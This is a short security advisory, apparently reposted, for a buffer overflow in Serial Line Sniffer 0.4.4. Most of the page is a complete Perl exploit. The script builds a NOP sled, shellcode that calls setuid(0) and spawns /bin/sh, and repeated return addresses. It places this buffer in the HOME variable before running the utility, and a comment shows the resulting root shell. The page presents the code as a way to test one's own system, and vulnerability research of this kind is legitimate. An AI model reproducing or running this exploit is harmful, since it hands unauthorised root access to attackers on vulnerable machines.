Serial Line Sniffer Buffer Overflow (Exploit)
Summary
slsnif is "a serial port logging utility. It listens to the specified serial port and logs all data going through this port in both directions".
Serial Line Sniffer Buffer has been found to be vulnerable to buffer overflow, the following exploit code can be used to test your system for the mentioned vulnerability.
Credit:
The information has been provided by Sintigan.
The original article can be found at: http://shellcoders.com/sintigan/slsnif-ploit.pl
Details
Vulnerable Systems:
* Serial Line Sniffer version 0.4.4
Exploit:
# Author: Sintigan@shellcoders.com
# http://www.shellcoders.com/
# ----------------------------------------
# Program ID: Serial Line Sniffer 0.4.4
#
# sintigan@midnight:/home/sintigan$ perl slsnif-ploit.pl
# sh-3.00# id
# uid=0(root) gid=100(users) groups=100(users)
# ---------------------------------------
#
# Greetz to Elohimus, Melkor, Modzilla, tgo, asTHma, and bk
# and whoever else i forgot
#
#!/usr/bin/perl
$shellcode = "\x31\xdb\x8d\x43\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73" . "\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
$buf = 288;
$ret = 0xbffff3a0;
$nop = "\x90";
$offset = -250;
if (@ARGV == 1) { $offset = $ARGV[0]; }
for ($i = 0; $i < ($buf - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
$addr = pack('l', ($ret + $offset));
for ($i += length($shellcode); $i < $buf; $i += 4) {
$buffer .= $addr;
}
$ENV{'HOME'} = $buffer; exec("/usr/local/bin/slsnif");
推荐
评论(0条)
